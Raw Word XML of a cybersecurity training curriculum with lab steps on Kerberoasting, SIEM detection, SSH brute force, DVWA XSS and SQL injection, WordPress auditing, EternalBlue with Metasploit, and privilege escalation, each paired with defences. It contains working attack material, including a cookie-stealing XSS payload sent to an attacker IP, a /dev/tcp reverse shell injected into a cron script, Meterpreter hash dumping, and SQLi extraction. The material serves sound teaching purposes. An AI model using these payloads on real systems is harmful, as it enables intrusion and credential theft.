        <w:t xml:space="preserve">🔬 Lab Steps — Day 17: Kerberoasting Attack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Kerberoasting: request TGS for service accounts → extract → crack offline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Step 1: Find SPNs (Kerberoastable accounts)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GetUserSPNs.py lab.local/alice:Password123 -dc-ip [WinServer_IP]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Output: svc_sql  MSSQLSvc/dc01.lab.local:1433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Step 2: Request the TGS ticket (extract the hash)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GetUserSPNs.py lab.local/alice:Password123 -dc-ip [WinServer_IP] -request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Copy the $krb5tgs$23$... hash to a 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Or request and save directly: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GetUserSPNs.py lab.local/alice:Password123 -dc-ip [WinServer_IP] -request -outputfile kerberoast-hashes.txt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Step 3: Crack with hashcat (mode 13100 = Kerberos TGS)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hashcat -m 13100 kerberoast-hashes.txt /usr/share/wordlists/rockyou.txt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Step 4: Show result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hashcat -m 13100 kerberoast-hashes.txt --show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If password is in rockyou.txt you will see: hash:Service@123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── DOCUMENT THE ATTACK CHAIN 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1. Enumerated domain with enum4linux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2. Found svc_sql has SPN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3. Requested TGS as low-priv user alice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4. Cracked hash to get svc_sql password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5. svc_sql may have admin rights → Domain Admin access possible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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Day 18: AD Defense &amp; Hardening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Run these on Windows Server (PowerShell as Admin)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── 1. USE STRONG SERVICE ACCOUNT PASSWORDS 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Change svc_sql to a 25+ character random password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Set-ADAccountPassword -Identity svc_sql -NewPassword (ConvertTo-SecureString 'K@r$3!mP@ssw0rd#2024$ecure!!' -AsPlainText -Force)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Long password = Kerberoasting crack is practically impossible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── 2. ENABLE ADVANCED AUDIT POLICIES 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Audit Account Logon Events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auditpol /set /subcategory:'Kerberos Authentication Service' /success:enable /failure:enable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auditpol /set /subcategory:'Account Logon' /success:enable /failure:enable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auditpol /set /subcategory:'Logon' /success:enable /failure:enable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Verify auditing enabled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auditpol /get /category:*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── 3. VERIFY KERBEROASTING IS NOW LOGGED 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Run GetUserSPNs.py again from Kali (same command as before)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Then on Server: check Event Viewer &gt; Security &gt; Event ID 4769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4769 = Kerberos Service Ticket Request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Encryption type 0x17 (RC4) = suspicious — modern systems use AES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── 4. DETECT IN SPLUNK/WAZUH (preview) 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After setting up Splunk (Day 20), use this SPL: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index=* EventCode=4769 TicketEncryptionType=0x17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| stats count by Account_Name, Client_Address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| where count &gt; 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── 5. PROTECTED USERS GROUP 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Add admin accounts to Protected Users — disables NTLM, RC4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Add-ADGroupMember -Identity 'Protected Users' -Members Administrator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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">💡 Key Commands Cheatsheet — Active Directory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ENUMERATION (from Kali)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enum4linux -a [DC_IP]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GetADUsers.py -all -dc-ip [DC_IP] domain/user:pass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GetUserSPNs.py domain/user:pass -dc-ip [DC_IP]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GetUserSPNs.py domain/user:pass -dc-ip [DC_IP] -request -outputfile hashes.txt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CRACKING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hashcat -m 13100 kerberoast.txt rockyou.txt   # TGS (Kerberoasting)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hashcat -m 5600 ntlm_hash.txt rockyou.txt     # NTLMv2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hashcat -m 1000 ntlm_hash.txt rockyou.txt     # NTLM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AD MANAGEMENT (PowerShell)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Get-ADUser -Filter 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Get-ADGroup -Filter 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New-ADUser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Set-ADUser -Identity user -ServicePrincipalNames @{Add='SPN'}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auditpol /set /subcategory:'...' /success:enable /failure:enable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BLOODHOUND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sudo neo4j start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bloodhound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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /06-active-directory/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AD-Attack-Chain-Report.pdf — enumerate → kerberoast → crack → defend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BloodHound-screenshot.png — attack path to Domain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AD-Defense-Checklist.pdf — 10 hardening controls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4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SOC / BLUE TEAM + SPLUNK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D0E8FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Days 19–24  |  Classes 16 + Missing Topics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br/>
              <w:t xml:space="preserve">19–20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⭐ Splunk + Wazuh SIEM Setup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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 Objective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 Splunk Free and Wazuh. Ingest logs from your VMs. Write 5 working SPL queries. This is the most asked-about skill in Pakistan SOC interviews.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Wazuh Setup (Ubuntu Server)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── WAZUH ALL-IN-ONE INSTALL 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On Ubuntu Server VM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curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh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sudo bash ./wazuh-install.sh -a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This installs: Wazuh Manager + Indexer + Dashboard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Takes 5-15 minutes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Note the admin password from install output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Access dashboard: https://[Ubuntu_IP]:443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Login: admin / [your password]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── ADD WINDOWS AGENT (Win10 VM) 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In Wazuh Dashboard: Agents &gt; Deploy new agent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Select: Windows, copy the install command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Run on Win10 PowerShell as Admin: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Invoke-WebRequest -Uri https://packages.wazuh.com/4.x/windows/wazuh-agent-4.7.0-1.msi -OutFile wazuh-agent.msi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msiexec.exe /i wazuh-agent.msi WAZUH_MANAGER=[Ubuntu_IP] WAZUH_REGISTRATION_SERVER=[Ubuntu_IP]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NET START WazuhSvc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── ADD KALI AGENT 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In Wazuh Dashboard: Agents &gt; Deploy new agent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Select: Debian/Ubuntu, copy install commands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Follow the steps on Kali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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Splunk Free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── INSTALL SPLUNK FREE (Kali or Ubuntu) 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Register at: https://www.splunk.com/en_us/download/splunk-enterprise.html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Download: Splunk Enterprise (free 60-day trial, then free with 500MB/day)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On Kali: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wget -O splunk.deb 'https://download.splunk.com/products/splunk/releases/[VERSION]/linux/splunk-[VERSION]-Linux-x86_64.deb'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sudo dpkg -i splunk.deb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sudo /opt/splunk/bin/splunk start --accept-license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Set admin username/password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Access: http://localhost:8000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Login: admin / [your password]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── ADD DATA TO SPLUNK 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Settings &gt; Add Data &gt; Monitor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Add: /var/log/auth.log (Linux auth logs)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Add: /var/log/syslog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For Windows logs — export Security.evtx from Win10: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Event Viewer &gt; Windows Logs &gt; Security &gt; Save All Events As &gt; Security.evtx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Copy to Kali, then: Settings &gt; Add Data &gt; Upload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── 5 ESSENTIAL SPL QUERIES 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Run these in Search &amp; Reporting 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Query 1: Find all failed SSH logins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index=* 'Failed password' | stats count by host, src_ip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Query 2: Find brute force (5+ failures from same IP)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index=* 'Failed password for' | rex 'from (?P&lt;src_ip&gt;\d+\.\d+\.\d+\.\d+)' | stats count by src_ip | where count &gt; 5 | sort -count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Query 3: Find successful logins after failures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index=* ('Failed password' OR 'Accepted password') | rex 'from (?P&lt;src_ip&gt;\d+\.\d+\.\d+\.\d+)' | stats values(action) as actions by src_ip | where mvcount(actions) &gt;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Query 4: Top 10 source IPs (any traffic)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index=* | stats count by src_ip | sort -count | head 10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Query 5: Windows Event ID 4625 (failed login)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index=* EventCode=4625 | stats count by Account_Name, IpAddress, WorkstationName | sort -count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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">💡 Splunk SPL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BASIC SEARCH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index=main                          # Search default index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index=* keyword                     # Search all indexes for keyword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TIME RANGE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index=* earliest=-24h latest=now    # Last 24 hours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index=* earliest=-7d@d              # Last 7 days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FILTERS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index=* host='kali'                 # Filter by host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index=* sourcetype='syslog'         # Filter by log type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STATISTICS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| stats count by field_name         # Count by field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| stats values(field) by other      # List unique values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| timechart count by field          # Count over time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EXTRACT FIELDS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| rex 'from (?P&lt;ip&gt;\d+\.\d+\.\d+\.\d+)'  # Extract IP with regex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| eval severity=if(count&gt;10,'HIGH','LOW')       # Create new field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FILTER RESULTS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| where count &gt; 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| search field='value'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SORT AND LIMIT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| sort -count                       # Sort descending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| head 10                           # Top 10 results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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /05-soc-analysis/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Splunk-Dashboard-Screenshot.png — your working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SPL-Query-Cheatsheet.pdf — your 5 queries with explanations and output screenshots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br/>
              <w:t xml:space="preserve">21–22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SSH Brute Force Lab + Windows Event Log Analysis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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Generate and Detect SSH Brute Force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── GENERATE BRUTE FORCE ATTACK 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From Kali → attack your Ubuntu VM (authorized lab only!)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First make sure SSH is running on Ubuntu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On Ubuntu: sudo systemctl status ssh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Use Hydra to brute force SSH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hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://[Ubuntu_IP] -t 4 -V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-l root = login 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-P = password list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-t 4 = 4 threads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-V = verbose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Stop after 30 seconds with Ctrl+C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── ANALYZE THE ATTACK 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On Ubuntu — check the logs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sudo tail -100 /var/log/auth.log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You will see: 'Failed password for root from [Kali_IP]'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Count failed attempts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sudo grep 'Failed password' /var/log/auth.log | wc -l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Find all source IPs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sudo grep 'Failed password' /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn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Check for any success (should be none with bad passwords)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sudo grep 'Accepted password' /var/log/auth.log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── NOW WRITE THE SOC TRIAGE TICKET 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Format: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Incident ID: IR-2026-001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Date/Time: [when it happened]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Severity: HIGH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Description: SSH brute force attack detected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Source IP: [Kali IP]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Target: Ubuntu Server [IP] port 22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Evidence: X failed attempts in Y minutes (auth.log)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Analysis: Attacker attempting to guess SSH credentials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Recommendation: Block source IP, enable fail2ban, disable password auth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Status: CONTAINED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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Install fail2ban (Defense)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Install fail2ban on Ubuntu Server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sudo apt install fail2ban -y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Configure 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sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local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sudo nano /etc/fail2ban/jail.local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Find [sshd] section and set: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enabled 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maxretry = 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bantime = 3600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Restart fail2ban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sudo systemctl restart fail2ban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sudo systemctl enable fail2ban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Check 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sudo fail2ban-client status sshd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Now run hydra again from Kali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hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://[Ubuntu_IP] -t 4 -V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After 5 attempts Kali gets BANNED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Connection will time out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Check the ban on Ubuntu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sudo fail2ban-client status sshd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Shows: Banned IP list: [Kali_IP]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Unban for continued testing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sudo fail2ban-client set sshd unbanip [Kali_IP]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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Sysmon + Windows Event IDs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Key Windows Security Event IDs to memorize for interviews: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4624 = Successful logon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4625 = Failed logon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4634 = Logoff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4648 = Logon using explicit credentials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4688 = Process created (needs Sysmon or audit policy)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4720 = User account created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4722 = User account enabled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4724 = Password reset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4732 = Member added to security-enabled local group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4768 = Kerberos TGT request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4769 = Kerberos service ticket request (Kerberoasting!)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4776 = NTLM authentication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7045 = New service installed (persistence!)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Install Sysmon on Win10 for enhanced logging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Download: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon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SwiftOnSecurity config: https://github.com/SwiftOnSecurity/sysmon-config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Run on Win10 PowerShell as Admin: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.\sysmon64.exe -accepteula -i sysmonconfig.xml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Generate test events on Win10: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Create user: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net user hacker Password123 /add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Add to admins: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net localgroup Administrators hacker /add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Check Event Viewer: Windows Logs &gt; Security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Filter: Event ID 4720 (account created)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Filter: Event ID 4732 (added to group)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Delete the test user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net user hacker /delete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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /05-soc-analysis/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SSH-Brute-Force-Triage-Ticket.pdf — formal SOC ticket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Windows-Event-IDs-Reference.pdf — cheatsheet with all key Event IDs + explanations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Fail2ban-Defense-Notes.pdf — how you detected and blocked the attack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5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WEB + WORDPRESS SECURITY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D0E8FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Days 25–31  |  Classes 15–18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br/>
              <w:t xml:space="preserve">25–28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OWASP Top 10 + Burp Suite + XSS + SQL Injection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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 Objective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up DVWA and OWASP Juice Shop. Exploit XSS and SQLi manually and with tools. Write professional finding reports. These are your freelance web audit deliverables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">⚙️ Lab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── DVWA (Damn Vulnerable Web App) on Ubuntu Server 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sudo apt install apache2 mysql-server php php-mysqli php-gd php-xml -y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cd /var/www/html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sudo git clone https://github.com/digininja/DVWA.git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sudo chown -R www-data:www-data DVWA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Configure database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sudo mysql -u root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In MySQL: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CREATE DATABASE dvwa;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CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';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GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';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FLUSH PRIVILEGES;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EXIT;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Edit DVWA config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sudo cp /var/www/html/DVWA/config/config.inc.php.dist /var/www/html/DVWA/config/config.inc.php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sudo nano /var/www/html/DVWA/config/config.inc.php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Change: db_password = 'p@ssw0rd'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Restart Apache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sudo systemctl restart apache2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Access: http://[Ubuntu_IP]/DVWA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Login: admin / password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Click 'Create / Reset Database'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Set Security Level: Low (for initial labs)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── OWASP JUICE SHOP (Docker) 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On Kali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sudo apt install docker.io -y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sudo systemctl start docker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sudo docker pull bkimminich/juice-shop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sudo docker run -d -p 3000:3000 bkimminich/juice-shop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Access: http://localhost:3000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── CONFIGURE BURP SUITE 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Burp is pre-installed on Kali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burpsuite &amp;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In Firefox on Kali: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Install FoxyProxy extension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Configure proxy: 127.0.0.1 port 8080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Burp: Proxy &gt; Options &gt; verify listening on 127.0.0.1:8080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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — XSS (Class 17)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In DVWA — set Security: Low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── REFLECTED XSS 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Go to: XSS (Reflected)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In the 'What's your name?' field, type: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&lt;script&gt;alert('XSS')&lt;/script&gt;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Click Submit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A popup appears — you have reflected XSS!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More dangerous payload — steal cookie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&lt;script&gt;document.write('&lt;img src="http://[Kali_IP]:4444/?cookie='+document.cookie+'"&gt;')&lt;/script&gt;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Set up a listener on Kali to catch the cookie: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python3 -m http.server 4444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Now submit the payload in DVWA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Check your Python server output — you see the PHPSESSID cookie!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── STORED XSS ────────────────────────────────────────────────────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Go to: XSS (Stored)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In the message box, type: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&lt;script&gt;alert('Stored XSS!')&lt;/script&gt;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Submit — the script fires every time ANYONE views the page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This is more dangerous than reflected because it persists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── SECURITY LEVEL: MEDIUM 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Change DVWA security to Medium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Try the same payload — blocked!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Bypass with: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&lt;img src=x onerror=alert('XSS')&gt;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Or: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&lt;svg onload=alert('XSS')&gt;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── DOCUMENT YOUR FINDINGS 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Professional finding format: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Title: Reflected Cross-Site Scripting (XSS) — /vulnerabilities/xss_r/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Severity: High | CVSS: 7.4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Affected URL: http://[IP]/DVWA/vulnerabilities/xss_r/?name=PAYLOAD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Description: The 'name' parameter reflects user input without sanitization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Evidence: Screenshot of alert() popup with payload shown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Impact: Session hijacking, credential theft, malware delivery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Remediation: HTML encode all user input, implement Content Security Policy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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — SQL Injection (Class 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In DVWA — set Security: Low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Go to: SQL Injection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── MANUAL SQLI ──────────────────────────────────────────────────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Normal input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Shows: First name: admin, Surname: admin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Test for SQLi vulnerability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1'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Error: You have an error in your SQL syntax...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This confirms SQLi is possible!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UNION-based extraction — guess column count first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1' ORDER BY 1-- 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1' ORDER BY 2-- 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1' ORDER BY 3-- -  # Error = table has 2 columns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Extract all users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1' UNION SELECT user, password FROM users-- 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Output: admin | 5f4dcc3b5aa765d61d8327deb882cf99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That hash is MD5 of 'password'!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Crack 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echo '5f4dcc3b5aa765d61d8327deb882cf99' | hashcat -m 0 - /usr/share/wordlists/rockyou.txt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── AUTOMATED WITH SQLMAP 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First capture the request in Burp Suite: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1. Enable Burp proxy, go to DVWA SQLi page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2. Submit any value (e.g., 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3. In Burp: Proxy &gt; HTTP History &gt; right-click request &gt; Save item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Save as: dvwa-sqli-request.txt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Run sqlmap with the saved request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sqlmap -r ~/labs/dvwa-sqli-request.txt --level=2 --risk=1 --batch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Extract the database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sqlmap -r ~/labs/dvwa-sqli-request.txt --dbs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sqlmap -r ~/labs/dvwa-sqli-request.txt -D dvwa --tables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sqlmap -r ~/labs/dvwa-sqli-request.txt -D dvwa -T users --dump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── DOCUMENT YOUR FINDINGS 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Title: SQL Injection — User ID Parameter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Severity: Critical | CVSS: 9.8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Evidence: sqlmap output + manual extraction of user hashes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Impact: Full database access, authentication bypass, potential OS access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Remediation: Parameterized queries, WAF, least-privilege DB accounts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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /04-web-security/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XSS-Finding-Report.pdf — professional format with payloads and screenshots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SQLi-Finding-Report.pdf — manual + automated approach documented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DVWA-Lab-Notes.pdf — your methodology walkthrough for interview discussion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br/>
              <w:t xml:space="preserve">30–31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⭐ WordPress Security Audit + OTT Security Checklist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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — WordPress Security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── INSTALL WORDPRESS LOCALLY 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On Ubuntu Server (already has Apache + MySQL)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cd /var/www/html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sudo wget https://wordpress.org/latest.tar.gz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sudo tar xzf latest.tar.gz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sudo chown -R www-data:www-data wordpress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Create WP database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sudo mysql -u root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CREATE DATABASE wordpress;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CREATE USER 'wpuser'@'localhost' IDENTIFIED BY 'wp_password';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GRANT ALL PRIVILEGES ON wordpress.* TO 'wpuser'@'localhost';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FLUSH PRIVILEGES; EXIT;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Complete WordPress setup via browser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http://[Ubuntu_IP]/wordpress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── WPSCAN — AUTOMATED WP SECURITY SCANNER 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wpscan is pre-installed on Kali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Basic scan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wpscan --url http://[Ubuntu_IP]/wordpress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User enumeration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wpscan --url http://[Ubuntu_IP]/wordpress --enumerate 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Plugin + theme enumeration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wpscan --url http://[Ubuntu_IP]/wordpress --enumerate p,t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All-in-one scan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wpscan --url http://[Ubuntu_IP]/wordpress --enumerate u,p,t,cb,dbe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u=users, p=plugins, t=themes, cb=config backups, dbe=db exports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Password brute force (controlled, own installation)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wpscan --url http://[Ubuntu_IP]/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames admin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── MANUAL CHECKS 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1. User enumeration via REST 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curl http://[Ubuntu_IP]/wordpress/wp-json/wp/v2/users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Returns: all usernames! A vulnerability.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2. XML-RPC exposed?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curl http://[Ubuntu_IP]/wordpress/xmlrpc.php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If returns 'XML-RPC server accepts POST requests' = exposed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3. Admin login URL exposed?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curl -I http://[Ubuntu_IP]/wordpress/wp-admin/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Should be 200 — anyone can reach the login page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4. Readme file exposed?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curl http://[Ubuntu_IP]/wordpress/readme.html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Often reveals WordPress version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5. Check for backup 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for ext in bak old backup zip sql tar.gz; do curl -I http://[Ubuntu_IP]/wordpress/wp-config.$ext; done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── WP HARDENING STEPS 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Add to wp-config.php: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define('WP_DEBUG', false);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define('DISALLOW_FILE_EDIT', true);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define('FORCE_SSL_ADMIN', true);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Disable XML-RPC (add to .htaccess):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&lt;Files xmlrpc.php&gt;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Order Deny,Allow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Deny from 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&lt;/Files&gt;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Disable user enumeration (add to functions.php):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add_filter('rest_endpoints', function($endpoints){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  if (isset($endpoints['/wp/v2/users'])) unset($endpoints['/wp/v2/users']);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  return $endpoints;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});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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 OTT App Security Checklist (Your Unique Portfolio Piece)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Based on your OTT development experience — audit these areas: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1. API TOKEN SECURITY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- Are tokens in URL parameters? (bad: /stream?token=abc123)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- Should be in Authorization header: Bearer abc123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Check: curl -v [OTT_API_ENDPOINT] and inspect headers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2. HTTPS / TLS VERIFICATION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- Does the app enforce HTTPS?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- Does it verify the certificate?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Check: openssl s_client -connect [API_HOST]:443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3. CERTIFICATE PINNING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- Does the app reject invalid/self-signed certs?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Test: Set up Burp Suite as proxy, use self-signed cert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If app still works = no cert pinning = MitM attack possible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4. HLS/DASH MANIFEST SECURITY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- Is the manifest URL guessable?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- Can you access other users content by changing IDs?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Test: Change video ID in URL — does it show error or another user's content?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5. TOKEN EXPIRY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- Do stream tokens expire?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- Can old tokens be reused?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Test: Copy a streaming token, wait 1 hour, try to reuse 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6. CDN DIRECT ACCESS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- Can you bypass authentication and access CDN URLs directly?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Test: Extract CDN URL from network traffic, access without auth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7. RATE LIMITING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- Is there rate limiting on login/API endpoints?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Test: Send 50 rapid requests to login endpoint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for i in {1..50}; do curl -s -o /dev/null -w '%{http_code}\n' [LOGIN_API]; done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8. ERROR MESSAGES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- Do error messages reveal internal paths, stack traces, or versions?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Test: Send invalid requests and observe error responses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9. CORS CONFIGURATION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- Does the API allow requests from any origin?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curl -H 'Origin: https://evil.com' -v [API_ENDPOINT] 2&gt;&amp;1 | grep 'Access-Control'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Bad: Access-Control-Allow-Origin: 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10. SUBSCRIPTION BYPASS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- Can free users access paid content by manipulating requests?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Test: Capture premium content request, replay with free account token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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /04-web-security/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WordPress-Security-Audit-Report.pdf — FLAGSHIP freelance deliverable, full professional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OTT-App-Security-Checklist.pdf — 10-point checklist with test commands — nobody else has this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6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EXPLOITATION + PRIVILEGE ESCALATION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D0E8FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Days 32–36  |  Classes 19, 23–24 + Missing Topics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br/>
              <w:t xml:space="preserve">32–33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Metasploit + EternalBlue (MS17-010)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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 Objective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Exploit a known vulnerability end-to-end using Metasploit. Document the full attack chain. This is the most-viewed portfolio piece by employers.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⚠️ Lab Requirement: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You need an UNPATCHED Windows 7 or Windows 10 v1507 VM for EternalBlue. Download Windows 7 ISO from Internet Archive. Do NOT apply Windows Updates. Keep this VM completely isolated on VirtualBox internal network only.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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — EternalBlue (MS17-010)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── PHASE 1: RECONNAISSANCE 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From Kali — find the vulnerable Windows VM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nmap -sV -p 445 192.168.1.0/24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Look for: 445/tcp open microsoft-ds Windows 7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Check if vulnerable to MS17-010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nmap --script smb-vuln-ms17-010 [Win7_IP]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Output: VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1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── PHASE 2: EXPLOITATION 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Launch Metasploit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msfconsole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Search for EternalBlue exploit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search eternalblue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Use the exploit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use exploit/windows/smb/ms17_010_eternalblue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Show options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show options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Set target IP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set RHOSTS [Win7_IP]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Set payload (Meterpreter = feature-rich shell)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set PAYLOAD windows/x64/meterpreter/reverse_tcp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set LHOST [Kali_IP]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Run the exploit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run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── PHASE 3: POST-EXPLOITATION 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If successful you get a Meterpreter shell!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Basic system info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getuid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Output: Server username: NT AUTHORITY\SYSTEM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This means you have FULL SYSTEM control!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sysinfo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Shows: Computer name, OS, Architecture, Language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Dump all password hashes (LSASS)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hashdump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Output: Administrator:500:aad3b...:31d6c...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These are NTLM hashes — crack with hashcat!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Take a screenshot of the desktop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screenshot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Show running processes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Search for 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search -f *.txt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search -f *password*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Download a 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download C:\\Users\\Administrator\\Desktop\\secret.txt /tmp/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Upload a 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upload /tmp/test.exe C:\\Windows\\Temp\\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Open a system shell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shell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whoami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ipconfig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exit  # return to Meterpreter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── PHASE 4: DEFENSE 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Exit Metasploit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exit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On Windows 7 VM — verify the patch fixes it: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1. Apply MS17-010 patch (KB4012212)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2. Disable SMBv1: Set-SmbServerConfiguration -EnableSMB1Protocol $false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3. Block port 445 on firewall: netsh advfirewall firewall add rule name='Block SMB' protocol=TCP dir=in localport=445 action=block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Run the exploit again — should fail now!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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">💡 Metasploit Command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msfconsole                          # Start Metasploit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search [keyword]                     # Search exploits/modules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use [module path]                    # Load a module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show options                         # Show required options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show payloads                        # Show available payloads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set RHOSTS [IP]                      # Set target IP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set LHOST [IP]                       # Set your (Kali) IP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set PAYLOAD [payload]                # Set payload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run / exploit                        # Execute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back                                 # Go back to previous context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METERPRETER COMMANDS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getuid                               # Current user context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sysinfo                              # System information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hashdump                             # Dump password hashes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screenshot                           # Desktop screenshot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ps                                   # Running processes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migrate [PID]                        # Migrate to another process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shell                                # Drop to system shell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download [remote] [local]           # Download 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upload [local] [remote]             # Upload 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search -f *.txt                      # Search for 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background                           # Background the session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sessions -l                          # List all sessions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sessions -i [id]                     # Interact with session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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /07-exploitation/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EternalBlue-Attack-Chain-Report.pdf — recon → exploit → post-exploit → defense (most viewed by employers)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Metasploit-Cheatsheet.pdf — command reference with examples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br/>
              <w:t xml:space="preserve">34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⭐ Privilege Escalation — Linux + Windows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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Linux PrivEsc with LinPEAS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On Ubuntu Server — run as a low-privilege user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Download LinPEAS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wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh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chmod +x linpeas.sh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Run LinPEAS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./linpeas.sh | tee linpeas-output.txt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Look for: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RED = Critical / Highly probable PE vector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YELLOW = Interesting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── COMMON PRIVESC VECTORS TO LOOK FOR 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1. SUID Binaries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find / -perm -u=s -type f 2&gt;/dev/null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If /usr/bin/find has SUID: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/usr/bin/find . -exec /bin/sh -p \; -quit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You get a root shell!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2. Sudo Misconfigurations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sudo -l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If output shows: (ALL) NOPASSWD: /usr/bin/vim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sudo vim -c ':!/bin/sh'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You get a root shell!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3. Writable /etc/passwd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ls -la /etc/passwd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If world-writable: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Add: newroot::0:0:root:/root:/bin/bash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su newroot  → root shell!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4. Writable Cron Jobs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crontab -l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ls -la /etc/cron*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cat /etc/crontab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If a cron script is world-writable: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echo '/bin/bash -i &gt;&amp; /dev/tcp/[Kali_IP]/4444 0&gt;&amp;1' &gt;&gt; /path/to/cron-script.sh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On Kali: nc -lvnp 4444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Wait for cron to run → reverse shell as root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5. PATH Hijacking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If script calls 'ls' without full path /bin/ls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Create malicious 'ls' in /tmp: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echo '/bin/bash' &gt; /tmp/ls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chmod +x /tmp/ls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export PATH=/tmp:$PATH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Run the vulnerable script → executes your 'ls' = root shell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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Windows PrivEsc with WinPEAS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On Windows 10 VM as standard user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Download WinPEAS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https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe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Copy to Win10 VM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Run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.\winPEASany.exe &gt; winpeas-output.txt 2&gt;&amp;1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type winpeas-output.txt | more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── COMMON WINDOWS PRIVESC VECTORS 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1. Unquoted Service Paths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If service path has spaces and no quotes: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C:\Program Files\Vulnerable Service\service.exe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Attacker can create: C:\Program.exe or C:\Program Files\Vulnerable.exe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Find unquoted service paths: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wmic service get name,displayname,pathname,startmode | findstr /i /v 'C:\Windows\\' | findstr /i /v '"'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2. AlwaysInstallElevated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reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated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reg query HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated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If both = 1 — create malicious MSI and install as admin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3. Weak Service Permissions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Can current user modify a service binary?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icacls 'C:\Path\To\Service.exe'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If current user has (M) or (F) = writable = replace with malicious binary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4. Stored Credentials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cmdkey /list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Any stored credentials? Use runas /savecred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5. Kernel Exploits (last resort)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systeminfo — check OS version and patches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Compare against Windows kernel exploit database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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /07-exploitation/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Linux-PrivEsc-Lab-Report.pdf — findings from LinPEAS + at least 1 exploited vector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Windows-PrivEsc-Lab-Report.pdf — findings from WinPEAS + analysis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813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7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PORTFOLIO + JOB CAMPAIGN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D0E8FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Days 37–45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br/>
              <w:t xml:space="preserve">37–38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GitHub Portfolio + Portfolio Website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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
